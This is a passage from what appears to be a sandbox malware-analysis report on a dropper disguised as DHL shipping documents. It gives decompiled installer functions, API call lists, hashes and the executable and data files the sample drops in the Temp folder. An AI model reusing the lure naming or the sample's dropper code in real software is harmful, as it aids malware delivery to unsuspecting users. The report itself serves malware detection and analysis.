                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                        • GlobalFree.KERNEL32 ref: 00406416
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 0040615C
                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                        • String ID: %ls=%ls$[Rename]$mB$uB$uB
                        • API String ID: 2171350718-2295842750
                        • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                        • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                        • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                        • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                        0x0040100a
                        0x00401039
                        0x00401047
                        0x0040104d
                        0x00401051
                        0x0040105b
                        0x00401061
                        0x00401064
                        0x004010f3
                        0x00401089
                        0x0040108c
                        0x004010a6
                        0x004010bd
                        0x004010cc
                        0x004010cf
                        0x004010d5
                        0x004010d9
                        0x004010e4
                        0x004010ed
                        0x004010ef
                        0x004010ef
                        0x00401100
                        0x00401105
                        0x0040110d
                        0x00401110
                        0x00401112
                        0x00401118
                        0x0040111f
                        0x00401126
                        0x00401130
                        0x00401142
                        0x00401156
                        0x00401160
                        0x00401165
                        0x00401165
                        0x00401110
                        0x0040116e
                        0x00000000
                        0x00401178
                        0x00401010
                        0x00401013
                        0x00401015
                        0x0040101f
                        0x0040101f
                        0x00000000

                        APIs
                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F
                        • API String ID: 941294808-1304234792
                        • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                        • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                        • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                        • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                        0x004066a5
                        0x004066a5
                        0x004066a5
                        0x004066ab
                        0x004066b0
                        0x004066c1
                        0x004066c1
                        0x004066c9
                        0x004066ca
                        0x004066cb
                        0x004066cc
                        0x004066cf
                        0x004066d7
                        0x004066d9
                        0x004066ea
                        0x004066ed
                        0x004066ed
                        0x004066f1
                        0x004066f7
                        0x004066fa
                        0x004068d5
                        0x004068d5
                        0x004068e0
                        0x004068ec
                        0x004068ec
                        0x00000000
                        0x00406700
                        0x00406705
                        0x0040671a
                        0x0040671b
                        0x00406721
                        0x004068b3
                        0x004068c1
                        0x004068c4
                        0x004068c4
                        0x004068b5
                        0x004068b8
                        0x004068bb
                        0x004068bd
                        0x004068bd
                        0x004068c6
                        0x004068c6
                        0x004068cc
                        0x004068cf
                        0x00406702
                        0x00000000
                        0x00406702
                        0x00000000
                        0x004068cf
                        0x00406727
                        0x0040672a
                        0x00406739
                        0x00406740
                        0x0040674c
                        0x0040674f
                        0x00406752
                        0x00406753
                        0x00406758
                        0x0040675e
                        0x00406761
                        0x00406764
                        0x00406857
                        0x0040685c
                        0x0040688f
                        0x00406894
                        0x00406899
                        0x0040689e
                        0x0040689e
                        0x004068a3
                        0x004068a9
                        0x004068ac
                        0x00000000
                        0x004068ac
                        0x0040685e
                        0x00406861
                        0x00406864
                        0x00406879
                        0x00406880
                        0x00406866
                        0x0040686d
                        0x0040686d
                        0x00406888
                        0x0040688b
                        0x0040684f
                        0x00406850
                        0x00406850
                        0x00000000
                        0x0040688b
                        0x00406771
                        0x00406775
                        0x00406775
                        0x00406776
                        0x00406778
                        0x004067b5
                        0x004067b8
                        0x004067c8
                        0x004067cb
                        0x004067d3
                        0x004067d9
                        0x004067d9
                        0x00406834
                        0x00406834
                        0x00406836
                        0x00000000
                        0x00000000
                        0x004067dd
                        0x004067e2
                        0x004067e3
                        0x004067e5
                        0x004067fc
                        0x0040680a
                        0x00406810
                        0x00406812
                        0x00406830
                        0x00406830
                        0x00406830
                        0x00000000
                        0x00406830
                        0x00406818
                        0x00406821
                        0x00406824
                        0x0040682a
                        0x0040682e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040682e
                        0x004067f6
                        0x004067f8
                        0x004067fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004067fa
                        0x00000000
                        0x00406834
                        0x004067c0
                        0x00000000
                        0x0040677a
                        0x00406798
                        0x004067a1
                        0x0040683e
                        0x00406842
                        0x0040684a
                        0x0040684a
                        0x00000000
                        0x00406842
                        0x004067ab
                        0x00406838
                        0x0040683c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040683c
                        0x00406778
                        0x00000000
                        0x00406705

                        APIs
                        • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000400), ref: 004067C0
                        • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                        • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                        • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Directory$SystemWindowslstrcatlstrlen
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                        • API String ID: 4260037668-4067843436
                        • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                        • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                        • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                        • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                        0x004056d0
                        0x004056da
                        0x004056df
                        0x004056e5
                        0x004056f0
                        0x004056f3
                        0x004056f6
                        0x004056fc
                        0x004056fc
                        0x00405702
                        0x0040570a
                        0x0040570d
                        0x0040572a
                        0x0040572e
                        0x00405737
                        0x00405737
                        0x00405741
                        0x0040574a
                        0x00405756
                        0x0040575d
                        0x00405761
                        0x00405764
                        0x00405777
                        0x00405785
                        0x00405785
                        0x00405789
                        0x0040578b
                        0x0040578e
                        0x00000000
                        0x0040578e
                        0x0040570f
                        0x00405717
                        0x0040571f
                        0x00405725
                        0x00000000
                        0x00405725
                        0x0040571f
                        0x0040570d
                        0x0040579a

                        APIs
                        • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                        • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                        • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                        • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                          • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                          • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                        • String ID: ('B
                        • API String ID: 1495540970-2332581011
                        • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                        • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                        • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                        • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                        0x0040463d
                        0x004046f3
                        0x00000000
                        0x004046f3
                        0x0040464e
                        0x00404652
                        0x00000000
                        0x0040466c
                        0x0040466c
                        0x00404675
                        0x00000000
                        0x00000000
                        0x00404677
                        0x00404683
                        0x00404686
                        0x00404686
                        0x0040468c
                        0x00404692
                        0x00404692
                        0x0040469e
                        0x004046a4
                        0x004046ab
                        0x004046ae
                        0x004046b1
                        0x004046b3
                        0x004046b3
                        0x004046bb
                        0x004046c1
                        0x004046c1
                        0x004046cb
                        0x004046d0
                        0x004046d3
                        0x004046d8
                        0x004046db
                        0x004046db
                        0x004046eb
                        0x004046eb
                        0x00000000
                        0x004046ee

                        APIs
                        • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                        • GetSysColor.USER32(00000000), ref: 00404686
                        • SetTextColor.GDI32(?,00000000), ref: 00404692
                        • SetBkMode.GDI32(?,?), ref: 0040469E
                        • GetSysColor.USER32(?), ref: 004046B1
                        • SetBkColor.GDI32(?,?), ref: 004046C1
                        • DeleteObject.GDI32(?), ref: 004046DB
                        • CreateBrushIndirect.GDI32(?), ref: 004046E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
